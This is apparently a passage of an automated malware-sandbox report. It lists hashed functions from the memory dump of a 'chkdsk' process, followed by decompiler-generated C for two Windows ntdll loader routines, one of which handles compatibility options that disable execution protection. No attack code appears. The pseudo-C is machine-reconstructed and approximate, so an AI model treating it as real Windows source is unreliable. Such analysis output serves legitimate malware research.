                                                                                                                    • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                                    • Instruction Fuzzy Hash: 69F0A93A308344DFDB05CF16C058AA57BE9BBA5360B000894EC86CB351EA35FC81CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05852500 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: b0322d95b43b841cf387fb3c74c22f0464404e1ee6329ea061fbb65c6445fab3
                                                                                                                    • Instruction ID: add83bb27e833e66820fda59bd35dbb27c756e9de7a54ced9f37c89f04d266cd
                                                                                                                    • Opcode Fuzzy Hash: b0322d95b43b841cf387fb3c74c22f0464404e1ee6329ea061fbb65c6445fab3
                                                                                                                    • Instruction Fuzzy Hash: EEE09273200744ABC721BB1CDC06F9A7B9AEB50374F004514F916971A0CB30AD10CBC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058481EB Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                    • Instruction ID: a0cfd44b3b760861d3f00fb199a6b89da6471c51e5342090fe223a14ef288292
                                                                                                                    • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                    • Instruction Fuzzy Hash: A7E08C32241618EFEB316A28DC04F6176E6BF00710F24086AED87860A08BB49C81DE4A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584B502 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                    • Instruction ID: 1dd7eea8a3d300691d99634c31b99f918acba297807c5392fcf3323a27f9e680
                                                                                                                    • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                    • Instruction Fuzzy Hash: 1BD05B31151750AADB313F18ED09F527675EF40B11F0509147901564F5C571DD84CA91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058CE588 Relevance: .0, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                    • Instruction ID: 4abbfb3ba09d72230a4c879057e130b22c2b3accf0a77d836782c0873db202aa
                                                                                                                    • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                    • Instruction Fuzzy Hash: E8E0EC75A547849FCB23DF99CA44F5ABBB9BB84B00F190498A8099B660C634ED00CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588E4BC Relevance: .0, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                    • Instruction ID: 8a552cb361e9fee5aa315dafb6f45458b38666bdafcd83ed19fcbb39eb63bc57
                                                                                                                    • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                    • Instruction Fuzzy Hash: 49D0C972254650AFD772AA1CFC04FD377E9BB88B21F160899F519C7151C765EC81C684
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584A093 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                                    • Instruction ID: 712640995a4a7af1eab754e8425a59f639f94f74e0786637033d5dddae0dbdec
                                                                                                                    • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                                    • Instruction Fuzzy Hash: 0FD02232207034D7CB3C66846914F737A06AB80A50F0A042C3C0AC7800C4008C42CAE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588A750 Relevance: .0, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                    • Instruction ID: f7e0ebce1f572e0d3ad079bef2aa0365c5637c729f9bba7e64f316c83b610f12
                                                                                                                    • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                    • Instruction Fuzzy Hash: 6AD012771D064CBBDB119F65DC01F957BA9E794B60F044420B904C75A0CA3AE950D584
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588C620 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                    • Instruction ID: 7a547f7a0269fa380864415ca71400175df69c759a85a6876484fcaaae636d6d
                                                                                                                    • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                    • Instruction Fuzzy Hash: CBC08033250744AFD711DF98CD01F0177A9E758B00F000421F70487570C531FC10D644
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058601C0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                    • Instruction ID: 6098f13164c01e796cb32d1aa3509a670700dd98f5f9c6e3d2a2dfdeef0aaa61
                                                                                                                    • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                    • Instruction Fuzzy Hash: C8D0C935312D80CFD71ACB0CC894B1533A8BB44B40F810490E801CB762D67CDD40CA04
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05850670 Relevance: .0, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                    • Instruction ID: 0547e56dac1502b4d5ab2078e334f4a7da2f9dc26b0b3eb7b729b10d77841210
                                                                                                                    • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                    • Instruction Fuzzy Hash: E2C04C397416418FDF15CB19C294F1977E8B754740F1508D0EC05CB721D624EC00CA11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05887550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E05887550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x594b370 ^ _t107;
				_v8 =  *0x594b370 ^ _t107;
				_t105 = __ecx;
				if( *0x5946664 == 0) {
					L5:
					return E05894B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E0585E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E05887738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E0588763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E05892B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E058876ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E058DEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E05898F40( &_v548, 0, 0x214);
						_t106 =  *0x5946664;
						_t110 = _t108 + 0x20;
						 *0x59491e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x5946664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E05894C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E058DEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E0589A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E058DEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E0589A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E058DEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E058CCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E058DEF10();
						goto L15;
					}
					L8:
					_t56 = E05887648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                    0x05887560
                                                                                                                    0x05887562
                                                                                                                    0x0588756f
                                                                                                                    0x05887571
                                                                                                                    0x058875ab
                                                                                                                    0x058875b9
                                                                                                                    0x058875b9
                                                                                                                    0x05887579
                                                                                                                    0x05887583
                                                                                                                    0x0588758f
                                                                                                                    0x058c4443
                                                                                                                    0x05887595
                                                                                                                    0x0588759e
                                                                                                                    0x0588759e
                                                                                                                    0x058875a2
                                                                                                                    0x058875bc
                                                                                                                    0x058875c2
                                                                                                                    0x058875c7
                                                                                                                    0x058875c9
                                                                                                                    0x05887621
                                                                                                                    0x05887623
                                                                                                                    0x05887624
                                                                                                                    0x058875f8
                                                                                                                    0x058875ff
                                                                                                                    0x05887601
                                                                                                                    0x0588762c
                                                                                                                    0x05887603
                                                                                                                    0x05887609
                                                                                                                    0x05887610
                                                                                                                    0x05887612
                                                                                                                    0x05887612
                                                                                                                    0x05887612
                                                                                                                    0x05887614
                                                                                                                    0x05887616
                                                                                                                    0x05887630
                                                                                                                    0x05887633
                                                                                                                    0x05887633
                                                                                                                    0x05887618
                                                                                                                    0x0588761a
                                                                                                                    0x058c45c9
                                                                                                                    0x058c45c9
                                                                                                                    0x058c45d1
                                                                                                                    0x058c45d2
                                                                                                                    0x058c45d4
                                                                                                                    0x058c45d6
                                                                                                                    0x058c45d6
                                                                                                                    0x00000000
                                                                                                                    0x0588761a
                                                                                                                    0x058875ce
                                                                                                                    0x058875d4
                                                                                                                    0x058875da
                                                                                                                    0x058875df
                                                                                                                    0x058875e1
                                                                                                                    0x058c444a
                                                                                                                    0x058c4450
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c4456
                                                                                                                    0x058c4469
                                                                                                                    0x058c4476
                                                                                                                    0x058c4486
                                                                                                                    0x058c448b
                                                                                                                    0x058c4497
                                                                                                                    0x058c44b9
                                                                                                                    0x058c44bf
                                                                                                                    0x058c44c1
                                                                                                                    0x058c44c3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c44c9
                                                                                                                    0x058c44cf
                                                                                                                    0x058c44d1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c44dc
                                                                                                                    0x058c44de
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c44e6
                                                                                                                    0x058c44ed
                                                                                                                    0x058c44ef
                                                                                                                    0x058c45c4
                                                                                                                    0x00000000
                                                                                                                    0x058c45c4
                                                                                                                    0x058c44f7
                                                                                                                    0x058c44f8
                                                                                                                    0x058c4510
                                                                                                                    0x058c4515
                                                                                                                    0x058c4524
                                                                                                                    0x058c452b
                                                                                                                    0x058c452c
                                                                                                                    0x058c452e
                                                                                                                    0x058c4556
                                                                                                                    0x058c4561
                                                                                                                    0x058c4567
                                                                                                                    0x058c4569
                                                                                                                    0x058c456c
                                                                                                                    0x058c456e
                                                                                                                    0x058c4574
                                                                                                                    0x058c4576
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c457c
                                                                                                                    0x058c457c
                                                                                                                    0x058c4584
                                                                                                                    0x058c4588
                                                                                                                    0x058c458a
                                                                                                                    0x058c458c
                                                                                                                    0x058c458e
                                                                                                                    0x058c458e
                                                                                                                    0x058c459b
                                                                                                                    0x058c45a0
                                                                                                                    0x058c45a7
                                                                                                                    0x058c45ac
                                                                                                                    0x058c45ae
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c45b4
                                                                                                                    0x058c45b4
                                                                                                                    0x058c45b7
                                                                                                                    0x058c45b7
                                                                                                                    0x00000000
                                                                                                                    0x058c45bf
                                                                                                                    0x058c4530
                                                                                                                    0x058c4535
                                                                                                                    0x058c4537
                                                                                                                    0x058c4539
                                                                                                                    0x00000000
                                                                                                                    0x058c453e
                                                                                                                    0x058875e7
                                                                                                                    0x058875e9
                                                                                                                    0x058875ee
                                                                                                                    0x058875f0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058875f2
                                                                                                                    0x00000000
                                                                                                                    0x058875a4
                                                                                                                    0x058875a4
                                                                                                                    0x058875a4
                                                                                                                    0x00000000
                                                                                                                    0x058875a4

                                                                                                                    Strings
                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 058C454D
                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 058C4460
                                                                                                                    • ExecuteOptions, xrefs: 058C44AB
                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 058C4592
                                                                                                                    • Execute=1, xrefs: 058C451E
                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058C4507
                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 058C4530
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                    • API String ID: 0-484625025
                                                                                                                    • Opcode ID: fac81593c0bb4dcc734ce3e3b3e2ddbb166f58265c9ab5103609d7c28483eab6
                                                                                                                    • Instruction ID: 47708ec9031e87f15707f960e6997165f37bb527f6bb25bcf78d1c2b40e7e407
                                                                                                                    • Opcode Fuzzy Hash: fac81593c0bb4dcc734ce3e3b3e2ddbb166f58265c9ab5103609d7c28483eab6
                                                                                                                    • Instruction Fuzzy Hash: B951E7316043196ADF10EB98DC9AFB977B9FF08704F1404E9ED06E7190EB719E45CAA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05859046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E05859046(void* __ebx, signed char* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr* _t146;
				intOrPtr* _t148;
				signed char* _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x592be98);
				E058A7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E05898F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E05869870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x59465e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E0586A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E05875A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E058704C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x59465e0; // 0x764da680
							 *0x59491e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x59465e8;
									if(_t148 != 0) {
										 *0x59491e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E0586DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E05863B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E05869870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E058B247B();
									goto L26;
								} else {
									_t152 = E0586A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
